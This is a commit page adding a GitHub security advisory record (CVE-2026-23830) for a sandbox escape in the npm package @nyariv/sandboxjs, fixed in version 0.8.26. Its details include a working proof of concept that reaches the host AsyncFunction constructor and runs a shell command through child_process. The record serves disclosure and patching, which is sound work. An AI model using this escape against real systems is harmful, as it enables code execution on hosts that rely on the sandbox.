Skip to content

Commit 4d9a9af

Browse files
1 parent 6773395 commit 4d9a9af

1 file changed

Lines changed: 63 additions & 0 deletions

File tree

Lines changed: 63 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,63 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-wxhw-j4hc-fmq6",
4+
"modified": "2026-01-27T19:55:11Z",
5+
"published": "2026-01-27T19:55:11Z",
6+
"aliases": [
7+
"CVE-2026-23830"
8+
],
9+
"summary": "SandboxJS has Sandbox Escape via Unprotected AsyncFunction Constructor",
10+
"details": "### Summary\nA sandbox escape vulnerability due to `AsyncFunction` not being isolated in `SandboxFunction`\n\n### Details\n\nThe library attempts to sandbox code execution by replacing the global `Function` constructor with a safe, sandboxed version (`SandboxFunction`). This is handled in `utils.ts` by mapping `Function` to `sandboxFunction` within a map used for lookups.\n\nHowever, the library did not include mappings for `AsyncFunction`, `GeneratorFunction`, and `AsyncGeneratorFunction`. These constructors are not global properties but can be accessed via the `.constructor` property of an instance (e.g., `(async () => {}).constructor`).\n\nIn `executor.ts`, property access is handled. When code running inside the sandbox accesses `.constructor` on an async function (which the sandbox allows creating), the `executor` retrieves the property value. Since `AsyncFunction` was not in the safe-replacement map, the `executor` returns the actual native host `AsyncFunction` constructor.\n\nConstructors for functions in JavaScript (like `Function`, `AsyncFunction`) create functions that execute in the global scope. By obtaining the host `AsyncFunction` constructor, an attacker can create a new async function that executes entirely outside the sandbox context, bypassing all restrictions and gaining full access to the host environment (Remote Code Execution).\n\n### PoC\n\n```js\nconst sandbox = require('@nyariv/sandboxjs');\nconst s = new sandbox.default();\n\nconst payload = `\n const af = async () => {};\n // .constructor returns the host AsyncFunction constructor because it's not intercepted\n const AsyncConstructor = af.constructor;\n console.log(\"AsyncConstructor name:\", AsyncConstructor.name);\n \n // Create a function that executes outside the sandbox\n const func = AsyncConstructor(\"return process.mainModule.require('child_process').execSync('id').toString()\");\n \n // Execute RCE\n const p = func();\n p.then(proc => {\n console.log(proc);\n });\n`;\n\ntry {\n s.compile(payload)().run();\n} catch (e) {\n console.error(\"Bypass failed:\", e.message);\n}\n```\n\nRun above script in nodejs. If you run it in browser, change the `AsyncConstructor` argument by returning `window` object. \n\n### Impact\n\nA Remote Code Execution, attacker may be able to run an arbitrary code.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@nyariv/sandboxjs"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.8.26"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-wxhw-j4hc-fmq6"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/nyariv/SandboxJS/commit/345aee6566e47979dee5c337b925b141e7f78ccd"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/nyariv/SandboxJS"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-693",
55+
"CWE-913",
56+
"CWE-94"
57+
],
58+
"severity": "CRITICAL",
59+
"github_reviewed": true,
60+
"github_reviewed_at": "2026-01-27T19:55:11Z",
61+
"nvd_published_at": null
62+
}
63+
}

0 commit comments

Comments
 (0)